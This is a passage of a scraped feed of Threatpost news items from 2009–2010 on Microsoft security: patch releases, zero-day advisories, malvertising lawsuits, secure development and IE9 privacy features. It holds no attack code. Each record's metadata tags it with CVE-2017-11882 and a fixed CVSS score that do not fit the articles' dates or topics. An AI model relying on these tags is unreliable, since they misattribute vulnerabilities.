SDLC was developed specifically for Microsoft\u2019s own internal processes and is not a one-size-fits-all methodology. But companies that are interested in using the lessons that Microsoft has learned throughout the process can use the SDLC as a starting point for their own efforts, Jim Molini, a senior program manager at Microsoft said in a talk at the OWASP AppSec DC conference here Thursday.\n\n\u201cIf you build software, you have to focus on how you build it, because it\u2019s becoming a higher priority attack vector right now,\u201d he said. \u201cThey\u2019re finding new ways to attack us and we have to find ways to buttress our software against these attacks.\u201d\n\nMolini said that a software security program has to be a comprehensive effort that includes everyone involved in the development process and must start with a fundamental change in the way that software is written. \n\n\u201cYou have to eliminate the separation of security in the development organization,\u201d he said. \u201cIt\u2019s really going to take people working together to fix this.\u201d\n\nMolini also emphasized that just having a whole bunch of other developers or testers look at the code is not enough.\n\n\u201cMany eyeballs don\u2019t solve the security problem. It\u2019s more than just being able to write code,\u201d Molini said. \u201cIt\u2019s fixing the process aspects and the software development processes in order to reduce the number of vulnerabilities you introduce. You can\u2019t just say zero-defect code is secure. You have to prioritize security as a development goal.\u201d\n\nSoftware security experts often say that when they show developers ways that their applications can be broken or abused, the developers protest that no user would ever do the things that broke the application. Users may not, but attackers most certainly will. To help eliminate this mentality, Molini said developers need to think like attackers and not users.\n\n\u201cYou need to develop abuse cases, not just use cases, so that the test team can develop tests for them,\u201d he said. \u201cThat will make your software much more secure in the long run.\u201d\n", "cvss3": {}, "published": "2009-11-12T19:08:15", "type": "threatpost", "title": "Microsoft Pushes for Better Software Security Practices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:11:49", "id": "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "href": "https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/73089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:22", "description": "After releasing its largest-ever group of security[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054141/windows_icon.jpg)](<https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/>) patches two weeks ago, Microsoft has done a little cleaning up.\n\nOver the past few days, the company has re-released two security updates and issued a workaround for a Windows CryptoAPI patch that caused Microsoft\u2019s own instant-messaging server to crash. [Read the full story](<http://www.computerworld.com/s/article/9140139/Microsoft_cleans_up_bugs_after_biggest_patch_release?source=rss_security>) [IDG News Service/Robert McMillan]\n", "cvss3": {}, "published": "2009-10-30T13:53:35", "type": "threatpost", "title": "Microsoft Cleans Up Bugs After Biggest Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:19:07", "id": "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "href": "https://threatpost.com/microsoft-cleans-bugs-after-biggest-patch-release-103009/72929/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:35", "description": "Less than a week after [a malicious advertising attack against the New York Times](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>) ad servers, Microsoft filed five civil lawsuits against companies allegedly using online advertising to serve malware.\n\nThe lawsuits allege that individuals using the business names \u201cSoft Solutions,\u201d \u201cDirect Ad,\u201d \u201cqiweroqw.com,\u201d \u201cITmeter INC.\u201d and \u201cote2008.info\u201d used malvertisements to distribute malicious software or present deceptive websites that peddled scareware to unsuspecting Internet users.\n\n\u201cAlthough we don\u2019t yet know the names of the specific individuals behind these acts, we are filing these cases to help uncover the people responsible and prevent them from continuing their exploits, [said Tim Cranton](<https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/>), associate general counsel at Microsoft.\n\nOur filings in King County Superior Court in Seattle outline how we believe the defendants operated, but in general, malvertising works by camouflaging malicious code as harmless online advertisements. These ads then lead to harmful or deceptive content. For example, ads may redirect users to a website that advertises rogue security software, also known as scareware, that falsely claims to detect or prevent threats on the computer. Malvertising may also directly infect a victim\u2019s computer with malicious software like Trojans \u2013 programs that can damage data, steal personal information or even bring the users\u2019 computer under the control of a remote operator.\n\nHere are the copies of Microsoft\u2019s court filings:\n\n * Microsoft Corp. and Microsoft Online Inc. v. John Does 1-20, d/b/a DirectAd Solutions: King Co. Superior Court Cause [No. 09-2-34024-2 SEA](<http://microsoftontheissues.com/cs/files/folders/32725/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a Soft Solutions, Inc. King Co. Superior Court Cause [No. 09-2-34021-8 SEA](<http://microsoftontheissues.com/cs/files/folders/32719/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a qiweroqw.com: King Co. Superior Court Cause [No. 09-2-34020-0 SEA](<http://microsoftontheissues.com/cs/files/folders/32722/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ote2008.info: King Co. Superior Court Cause [No. 09-2-34022-6 SEA](<http://microsoftontheissues.com/cs/files/folders/32720/download.aspx>)\n * Microsoft Corp. v. John Does 1-20, d/b/a ITmeter Inc. : King Co. Superior Court Cause [No. 09-2-34023-4 SEA](<http://microsoftontheissues.com/cs/files/folders/32724/download.aspx>)\n", "cvss3": {}, "published": "2009-09-23T22:40:03", "type": "threatpost", "title": "Microsoft Takes Aim at Malvertising Threat", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:50", "id": "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "href": "https://threatpost.com/microsoft-takes-aim-malvertising-threat-092309/72218/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Microsoft\u2019s September batch of security updates will include fixes for a multiple \u201ccritical\u201d vulnerabilities affecting the Windows operating system.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053133/windows_patch2.jpg)](<https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/>)\n\nIn all, the software maker [will release five bulletins](<http://www.microsoft.com/technet/security/bulletin/ms09-sep.mspx>) with patches for a range of flaws that could expose users to remote code execution attacks.\n\nThe flaws affected all supported versions of Windows, including Windows Vista and Windows Server 2008.\n\nMicrosoft describes a \u201ccritical\u201d vulnerability as one whose exploitation could allow the propagation of an Internet worm without user action so it\u2019s important that Windows users treat next Tuesday\u2019s updates with the highest priority.\n\nIt is not yet clear if this month\u2019s patches will cover the FTP in IIS vulnerability that was disclosed with exploit code earlier this week.\n", "cvss3": {}, "published": "2009-09-08T11:59:04", "type": "threatpost", "title": "Five Critical Bulletins Coming on MS Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:49", "id": "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "href": "https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/72234/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:43", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054206/broken_windows_shield.jpg)](<https://threatpost.com/windows-wins-attacks-wild-081909/>)The \u201ccritical\u201d WINS vulnerability that Microsoft issued a patch for last week is now being exploited actively in the wild, [according to the SANS Institute](<http://isc.sans.org/diary.html?storyid=6976>) [sans.org].\n\nThe Internet Storm Center (ISC), which is operated by SANS, is receiving preliminary reports that hackers are targeting Microsoft\u2019s WINS service on Windows NT, 2000 and 2003 servers. [Read the full story](<http://www.cio.com/article/499904/Windows_WINS_Attacks_in_the_Wild?source=rss_security>) [networkworld.com]\n", "cvss3": {}, "published": "2009-08-19T14:44:56", "type": "threatpost", "title": "Windows WINS Attacks In The Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:50", "id": "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "href": "https://threatpost.com/windows-wins-attacks-wild-081909/72957/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:44", "description": "[From Network World (Ellen Messmer)](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>)[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054215/ie8.jpg)](<https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/>)\n\nMicrosoft\u2019s Internet Explorer 8 rated tops among five browsers tested by NSS Labs for effectiveness in protecting against malware and phishing attacks \u2014 though NSS Labs acknowledges Microsoft paid for the tests.\n\nNevertheless, the test process, which lasted over a two-week period in July at the NSS Labs in Austin, evaluated the browsers based on access to live Internet sites and in theory could be duplicated elsewhere. Apple Safari 4, Google Chrome 2, Mozilla Firefox 3, and Opera 10 beta were evaluated as being behind Microsoft IE 8 when it comes to browser protection against phishing and malware, mainly because Microsoft was deemed more speedy and comprehensive in delivering updates about known phishing and malware to the user\u2019s desktop browser. [Read the full story](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>) [thestandard.com] Here\u2019s [a link to the study and results](<http://nsslabs.com/test-reports/NSS%20Labs%20Browser%20Security%20Test%20-%20Socially%20Engineered%20Malware.pdf>) [pdf from nsslabs.com]\n", "cvss3": {}, "published": "2009-08-14T16:33:17", "type": "threatpost", "title": "Microsoft IE 8 Shines in Web Browser Security Test", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "href": "https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/72970/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:51", "description": "![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054115/eric_schultze1.jpg)\n\nMicrosoft released six security bulletins today \u2014 three rated Critical and three rated Important. Two of the issues are being actively exploited on the Internet and four of the issues are client-side vulnerabilities, which means the exploit can only occur if a user visits an evil website or opens a malformed document.\n\nToday\u2019s release is important because patches were released for two recent 0-day attacks \u2013 a QuickTime file parsing vulnerability and the recently announced Directshow vulnerability. Both vulnerabilities are reported as being actively exploited on the Internet.\n\nWhile Microsoft has announced workarounds and/or provided Fixit tools for each of these issues, today\u2019s patches will be welcomed by network administrators who have been tasked with remediating these issues. I recommend that network administrators download and install the patches for these two bulletins as soon as possible (MS09-032 and MS09-028)\n\nTwo of Microsoft\u2019s other releases this month apply to products that you don\u2019t see patched very often \u2013 ISA Server 2006 and Virtual PC. Although these two products are associated with security functions, neither flaw is as bad as it seems and Microsoft has rated the severity for each of these as Important.\n\nOf the two remaining bulletins, one applies to Publisher (Important) and one applies to the Operating System (Critical). Neither of these issues were publicly known prior to release, though I recommend reviewing and installing each of these patches as appropriate on your networks. The Operating System patch (MS09-029) is particularly nasty and can execute when a user views an evil web page, email, or Office document.\n\nI recommend installing MS09-028, 29, and 32 patches first (DirectShow, OS Font patch, and Video Control). These are the three Critical patches \u2013 which goes to show that Microsoft got the Severity ratings spot-on this month.\n\n**Details for MS09-032 and MS09-028:**\n\nMS09-032 is the bulletin for the QuickTime file parsing vulnerability. Clicking on an evil hyperlink or even hovering your mouse over a malformed QuickTime file could allow the attacker to execute code on your system. The attacker\u2019s code would have the same level of permission to your computer as the person who is logged on to the computer. If you\u2019re logged on as admin, the exploit could add or remove users and administrators from your machine, delete files, reformat your hard drive, or embed trojans or worms that could be used in future attacks.\n\nIt\u2019s important to note for this issue that the presence or absence of Adobe QuickTime is not relevant to whether or not your computer is vulnerable to this issue. The flaw resides in the Microsoft components that parse QuickTime files \u2013 so don\u2019t believe that you\u2019re safe just because you don\u2019t have QuickTime installed. Also, the recent QuickTime patch from Adobe (7.6.2) is not related to this issue.\n\nMS09-032 is rated as Critical for all Operating Systems.\n\nMS09-028 is the bulletin for the recently announced Microsoft DirectShow vulnerability. Viewing a malformed media file from a Windows XP or Windows Server 2003 system can enable the attacker to execute code on your system. Similar to MS09-032, the evil code will run in the context of the currently logged on user and can take any action on that system that the logged on user can take.\n\nMicrosoft released a FixIt tool that sets the browser killbits for this vulnerable section of code. The MS09-032 patch is a cumulative killbit patch that includes the killbits from the FixIt tool as well as all previously released ActiveX killbits. Users who installed the ActiveX cumulative patch from June 2009 and also ran the FixIt tool for the DirectShow have already implemented the complete set of killbits reprented by the MS09-028 patch. If you ran the FixIt tool or otherwise implemented the Microsoft suggested workaround you are safe \u2013 there\u2019s no need to revert changes that you made.\n\nWhile the public exploit only impacts XP and 2003 systems, Microsoft recommends installing this patch on all Operating Systems as it includes killbits for all previously known bad ActiveX controls.\n\nDetails for the remaining four:\n\n**MS09-029** applies to all Operating Systems and could be a particularly nasty issue if left unpatched. The flaw resides in the way that Microsoft parses embedded fonts on web pages, emails, and Office documents. (in this case, embedded opentype fonts. EOT fonts ensure that everyone viewing the text sees it formatted the same way.) Viewing an evil web page, email, or Office doc could allow the attacker to execute code on your system. Workarounds are available, but it requires two separate changes to be made \u2013 one to protect from web content and the other to protect from evil emails and documents.\n\n**MS09-030** is a vulnerability in Microsoft Publisher documents. Viewing a malformed document could allow the attacker to run code on your system. This seems like the hundredth vulnerability in Publisher this year, and the millionth \u2018open an evil document and get hacked\u2019 vulnerability in the past two years.\n\n**MS09-031** discusses an issue with ISA Server 2006. If the ISA Server is specifically configured to use Radius one-time-passwords AND to use Kerberos for authentication AND to fallback to basic http authentication when asked, the attacker may be able to access servers protected by the firewall if they know the username of those target systems. It sounds scary, but it\u2019s probably a very small number of systems in the world that are configured exactly this way. An edge case at best. If you have an ISA Server 2006 and you\u2019re concerned that you might meet all three criteria above, it\u2019s best to patch your system. \n** \nMS09-033** relates to Guest Operating Systems that are hosted on Microsoft Virtual PC or Virtual Server. These virtualized systems are subject to a privilege escalation attack. (Non-virtualized systems are not vulnerable.) Users who can execute code on the virtual systems can run an exploit and become administrator on the virtual images. At no time can this flaw lead to compromise of the underlying Virtual PC or Virtual Server. IOW, it\u2019s not the much-hyped but yet-to-be-seen exploit that crosses the virtualization barrier.\n\n_* Eric Schultze is chief technology officer at Shavlik Technologies, a vulnerability management company._\n", "cvss3": {}, "published": "2009-07-14T19:02:19", "type": "threatpost", "title": "Inside Microsoft's July Security Patch Batch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T16:20:54", "id": "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "href": "https://threatpost.com/inside-microsofts-july-security-patch-batch-071409/72909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "[From InfoWorld (Roger Grimes)](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054024/microsoft_security.jpg)](<https://threatpost.com/microsoft-takes-lead-security-061909/>)Talk about a turnaround. It\u2019s always hard to recognize the larger, slow-moving paradigm shifts as they happen. But after a decade of bad press regarding its commitment to software security, Microsoft seems to have turned the tide. Redmond is getting consistent security accolades these days, often from the very critics who used to call it out. Many of the world\u2019s most knowledgeable security experts are urging their favorite software vendors to follow in the footsteps of Microsoft. Read the full story [[InfoWorld.com](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)].\n", "cvss3": {}, "published": "2009-06-19T18:13:35", "type": "threatpost", "title": "Microsoft Takes the Lead in Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "href": "https://threatpost.com/microsoft-takes-lead-security-061909/72854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:58", "description": "[From ZDNet (Ryan Naraine)](<http://blogs.zdnet.com/security/?p=3553>)\n\nMicrosoft\u2019s batch of patches this month is a big one: 10 bulletins covering a total of 31 documented vulnerabilities affecting the Windows OS, the Internet Explorer browser and the Microsoft Office productivity suite (Word, Works and Excel).\n\nFive of the 10 bulletins are rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Among the patches this month are fixes for [a pair of IIS WebDav flaws that were publicly disclosed](<http://blogs.zdnet.com/security/?p=3424>) last month and cover for the [CanSecWest Pwn2Own vulnerability](<http://blogs.zdnet.com/security/?p=2951>) that was used to exploit Internet Explorer on Windows 7. Read the full story [here](<http://blogs.zdnet.com/security/?p=3553>).\n", "cvss3": {}, "published": "2009-06-09T20:26:38", "type": "threatpost", "title": "Microsoft unleashes 31 fixes on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:09", "id": "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "href": "https://threatpost.com/microsoft-unleashes-31-fixes-patch-tuesday-060909/72724/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[From Computerworld (Gregg Keizer)](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>)[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053720/2_touch.jpg)](<https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/>)\n\nAfter discovering attack code on a brand new Windows XP netbook, anti-virus vendor Kaspersky Labs warned users yesterday that they should scan virgin systems for malware before connecting them to the Internet.\n\nWhen Kaspersky developers installed their recently-released Security for Ultra Portables on an M&A Companion Touch netbook purchased for testing, \u201cthey thought something strange was going on,\u201d [said Roel Schouwenberg](<http://www.viruslist.com/en/weblog?weblogid=208187720>) [viruslist.com], a senior anti-virus researcher with the Moscow-based firm. Schouwenberg scanned the machine \u2014 a $499 netbook designed for the school market \u2014 and found three pieces of malware. [Read the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>) [computerworld.com]\n", "cvss3": {}, "published": "2009-05-19T15:38:56", "type": "threatpost", "title": "New Windows netbooks may harbor malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:14", "id": "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "href": "https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/72668/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:16", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053617/microsoft_99.jpg) \n](<https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/>)\n\nMicrosoft on Wednesday plans to launch a new research effort to determine the total cost of the patch-management cycle, from testing and distributing a fix to user deployment of the patch. The end result of the project, which will be completely open and transparent to outsiders, will be a full metrics model that the company plans to make freely available.\n\nThe metrics project will be handled by the analyst firm Securosis, which will do surveys and interviews with end users and will be responsible for building out the model. Rich Mogull, the firm\u2019s founder, said when Microsoft contacted him about the project he was encouraged by the open, product-neutral way in which the company wanted to approach it. \n\n\u201cThis is not a vendor tool. It\u2019s not product-focused at all,\u201d Mogull said. \u201cIt\u2019s focused on the organizations and the end users. We\u2019re looking at the patch management cycle. What are the total costs for the total cycle, from monitoring what you need to patch all the way to getting the patch out.\u201d\n\nAs part of the process, Securosis will be posting all of the correspondence between the firm and Microsoft about the project, inviting other vendors to participate and make suggestions and encouraging users to comment on the project as it progresses. Mogull said he hopes to have the first version of the model finished by the end of June.\n\nThe project is beng driven on Microsoft\u2019s end by Jeff Jones, a strategy director in the company\u2019s Security Technology Unit. Mogull said that he and Jones have talked at length about the transparency and objectivity requirements around the metrics model.\n\n\u201cOur research model is radically transparent and that\u2019s how this is going to be too,\u201d Mogull said. \u201cEverything will be out in the open. I wouldn\u2019t do something like this if it wasn\u2019t. The goal for the project is to produce an objective, independent model, irrespective of Microsoft.\u201d\n\nMogull has created a separate [Web page](<http://securosis.com/projectquant>) to discuss the project, which is where the materials related to the effort will be available once it gets underway. He lists the goals and deliverables of the effort, which he\u2019s calling Project Quant for now, and emphasizes the open and transparent nature of the project.\n\n\u201cAll materials will be made publicly available throughout the project, including internal communications (the Totally Transparent Research process). The model will be developed through a combination of primary research, surveys, focused interviews, and public/community participation,\u201d Mogull writes.\n\n*Composite header image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2009-04-15T11:45:37", "type": "threatpost", "title": "Microsoft to unveil patch management metrics project", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:21", "id": "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "href": "https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/72588/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053533/microsoft_office1.jpg)](<https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/>)Microsoft has issued an advisory to warn about an under-attack zero-day vulnerability affecting its PowerPoint software.\n\nAccording to [the pre-patch advisory](<http://www.microsoft.com/technet/security/advisory/969136.mspx>), the flaw allows remote code execution if a user opens a booby-trapped PowerPoint file. The company described the attacks as \u201climited and targeted.\u201d\n\nAffected software:\n\nMicrosoft Office PowerPoint 2000 Service Pack 3 \nMicrosoft Office PowerPoint 2002 Service Pack 3 \nMicrosoft Office PowerPoint 2003 Service Pack 3 \nMicrosoft Office 2004 for Mac\n\nIn the absence of a fix, Microsoft [recommends](<http://www.microsoft.com/technet/security/advisory/969136.mspx>) the following workarounds:\n\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources.\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a file.\n * Use the Microsoft Office Isolated Conversion Environment (MOICE) when opening files from unknown or untrusted sources. \n * The Microsoft Office Isolated Conversion Environment (MOICE) will protect Office 2003 installations by more securely opening Word, Excel, and PowerPoint binary format files.\n * Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents from unknown or untrusted sources and locations.\n", "cvss3": {}, "published": "2009-04-02T23:35:53", "type": "threatpost", "title": "Microsoft issues PowerPoint zero-day warning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "href": "https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/72535/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053333/microsoftsecurity1.jpg)](<https://threatpost.com/should-microsoft-be-security-business-031909/>)\n\nGartner security analyst Neil MacDonald thinks [there are five levels to the discussion](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) [gartner.com] about whether Microsoft should be in the security business. They include secure coding (obviously), secure functionality in the platform at no cost (of course), add-on security products at a fee (maybe) and paid cloud-based security services (sure).\n\nRead [the full blog post and take a stab at the questions](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) MacDonald poses.\n\nImage [via Wonderlane](<http://www.flickr.com/photos/wonderlane/1378294362/>) (Flickr CC 2.0)\n", "cvss3": {}, "published": "2009-03-19T15:18:05", "type": "threatpost", "title": "Should Microsoft be in the security business?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:36", "id": "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "href": "https://threatpost.com/should-microsoft-be-security-business-031909/72395/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:31", "description": "Microsoft has pushed out a new release candidate of Internet Explorer 9 that includes two new privacy protections designed to enable consumers to prevent tracking by some Web sites.\n\nThe new [IE 9 release candidate](<http://blogs.msdn.com/b/ie/archive/2010/12/07/ie9-and-privacy-introducing-tracking-protection-v8.aspx>) has two separate, but related, technologies aimed at giving users more control over how sites track them and what data is sent back to the site\u2019s owners: Tracking Protection and Tracking Protection Lists. The functionality allows user to specify exactly which sites they will allow to track them to some extent and enables sites to publish lists that show consumers what information might be collected.\n\nThe announcement by Microsoft comes in the midst of a complex discussion among lawmakers, regulators and privacy advocates about whether a national \u201cDo-Not Track\u201d list for browsers is desirable or even feasible. The [Federal Trade Commission recently proposed such a list](<https://threatpost.com/ftc-pushes-do-not-track-option-web-browsers-120110/>) in a report it released on privacy issues. Microsoft officials said that they were interested in finding a way to answer some of the same questions raised by the FTC.\n\n\u201cWe believe that the combination of consumer opt-in, an open platform for \npublishing of Tracking Protection Lists (TPLs), and the underlying \ntechnology mechanism for Tracking Protection offer new options and a \ngood balance between empowering consumers and online industry needs. \nThey further empower consumers and complement many of the other ideas \nunder discussion,\u201d Dean Hachamovitch, corporate vice president for IE at Microsoft wrote in a blog post about the new features. \u201cWhile \u2018Do not track\u2019 is a meaningful consumer promise around data use, the web lacks a good precise definition of [what tracking means](<http://www.research-live.com/ftc-chief-says-do-not-track-idea-is-still-on-the-table/4003244.article>). \nUntil we get there, we can make progress by providing consumers with a \nway to limit or control the data collected about them on sites they \ndon\u2019t visit directly. That kind of control is already technically \nfeasible today [in a variety of ways](<http://blogs.msdn.com/b/ie/archive/2010/11/30/selectively-filtering-content-in-web-browsers.aspx>). \nIt is important to understand that the feature design makes no judgment \nabout how information might be used. Rather, it provides the means for \nconsumers to opt-out of the release of that information in the first \nplace.\u201d\n\nThe new privacy mechanisms in IE 9 will be opt-in, so users will need to make conscious decisions about what sites they are blocking and which they are allowing to track them. Users will be able to manually add specific sites to the Tracking Protection mechanism and also can add Tracking Protection Lists published by various Web sites to their browsers. The TPLs will include URLs that the user only wants IE to call out to if the user actually types the address into the browser or clicks on a link to the site. \n\n\u201cIn addition to \u2018Do Not Call\u2019 entries that prevent information \nrequests to some web addresses, lists can include \u2018OK to Call\u2019 entries \nthat permit calls to specific addresses. In this way, a consumer can \nmake exceptions to restrictions on one list easily by adding another \nlist that includes \u2018OK to Call\u2019 overrides for particular addresses,\u201d Hachamovitch wrote. \u201cWe \ndesigned this feature so that consumers have a clear, straight forward, \nopt-in mechanism to enable a higher degree of control over sharing \ntheir browsing information AND websites can provide easy to use lists to \nmanage their privacy as well as experience full-featured sites.\u201d\n", "cvss3": {}, "published": "2010-12-07T20:00:18", "type": "threatpost", "title": "Microsoft Adds Tracking Protection to IE 9", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:34", "id": "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "href": "https://threatpost.com/microsoft-adds-tracking-protection-ie-9-120710/74747/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060228/ie_target.png)](<https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/>)There\u2019s a new flaw in all of the current versions of Internet Explorer that is being used in some targeted attacks right now. Microsoft has confirmed the bug and said it is working on a fix, but has no timeline for the patch release yet. The company did not rule out an emergency out-of-band patch, however.\n\nThe new bug in Internet Explorer affects versions 6, 7 and 8, but is not present in IE 9 beta releases, Microsoft said. The company has released an [advisory on the IE vulnerability](<https://www.microsoft.com/technet/security/advisory/2458511.mspx>) and says that some of the exploit protections it has added to recent versions of IE and Windows can help protect against attacks on the bug. Microsoft said that IE 8 running on Windows XP SP 3 and later versions of Windows has DEP (Data Execution Prevention) enabled by default, which helps stop attacks against this specific bug. IE running in Protected Mode also helps mitigate the effects of attacks.\n\n\u201cThe vulnerability exists due to an invalid flag reference within \nInternet Explorer. It is possible under certain conditions for the \ninvalid flag reference to be accessed after an object is deleted. In a \nspecially-crafted attack, in attempting to access a freed object, \nInternet Explorer can be caused to allow remote code execution.\n\n\u201cAt \nthis time, we are aware of targeted attacks attempting to use this \nvulnerability. We will continue to monitor the threat environment and \nupdate this advisory if this situation changes. On completion of this \ninvestigation, Microsoft will take the appropriate action to protect our \ncustomers, which may include providing a solution through our monthly \nsecurity update release process, or an out-of-cycle security update, \ndepending on customer needs,\u201d Microsoft said in its advisory.\n\nThe new IE flaw is likely to be targeted through drive-by download attacks, a common attack scenario for browser vulnerabilities. \n\n\u201cIn a Web-based attack scenario, an 